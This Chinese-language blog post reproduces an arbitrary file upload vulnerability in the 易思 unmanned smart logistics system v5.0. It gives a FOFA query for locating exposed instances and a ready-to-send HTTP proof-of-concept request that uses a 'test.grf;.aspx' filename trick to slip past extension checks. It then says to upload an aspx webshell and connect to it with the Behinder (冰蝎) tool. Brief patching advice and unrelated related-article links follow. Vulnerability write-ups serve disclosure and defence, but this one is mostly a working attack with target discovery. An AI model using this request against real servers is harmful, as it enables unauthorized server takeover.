漏洞复现-易思无人值守智能物流文件上传

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!

一:漏洞描述

易思无人值守智能物流系统/Sys_ReportFile/ImportReport接口处存在任意文件上传漏洞,未经授权的攻击者可通过此漏洞上传恶意后门文件,从而获取服务器权限。

二:漏洞影响版本

v5.0

三:网络空间测绘查询

fofa:

"易思无人值守智能物流"

四:漏洞复现

poc:

复制代码
Host: ip:port
X-File-Name: test.grf
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryxzUhGld6cusN3Alk
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 0

------WebKitFormBoundaryxzUhGld6cusN3Alk
Content-Disposition: form-data; name="file"; .filename="test.grf;.aspx"
Content-Type: application/octet-stream

hello
------WebKitFormBoundaryxzUhGld6cusN3Alk--



上传aspx马,冰蝎连接

五:修复建议

对上传文件的类型、大小、文件名等进行验证,确保只允许上传合法的文件类型,并限制文件大小和文件名的长度。可以使用白名单或黑名单的方式进行验证。

及时关注和应用厂商发布的安全补丁和更新,修复已知的文件上传漏洞。

相关推荐
领世达检测V1335290924914 分钟前
智能门锁申请 EN 18031 欧盟网络安全认证指南
网络·安全
中云DDoS CC防护蔡蔡23 分钟前
自己的服务器被 DDOS跟CC攻击了怎么处理,如何抵御攻击?
运维·服务器·经验分享·网络安全·ddos
嘉里蓝海24 分钟前
危险品运输行业观察
安全·物流
独行soc39 分钟前
2025年渗透测试面试题总结-字节跳动[实习]安全研发员(题目+回答)
linux·科技·安全·面试·职场和发展·渗透测试
00后程序员张1 小时前
实战解析:如何用克魔(KeyMob)等工具构建iOS应用稳定性与数据可观测体系
websocket·网络协议·tcp/ip·http·网络安全·https·udp
bbsh20992 小时前
SiteAzure:SetCookie 未设置Secure
前端·网络·安全·siteazure
小小工匠2 小时前
每日一博 - JWT 安全实战指南
安全·jwt
2501_915921434 小时前
iOS性能调试完整流程实录:工具组合下的问题定位与修复实践(含keymob)
websocket·网络协议·tcp/ip·http·网络安全·https·udp
tyl21105 小时前
凌科芯安国产安全MCU简介
单片机·嵌入式硬件·安全
Le_ee5 小时前
pikachu——php反序列化
网络安全·靶场·php·pikachu·php反序列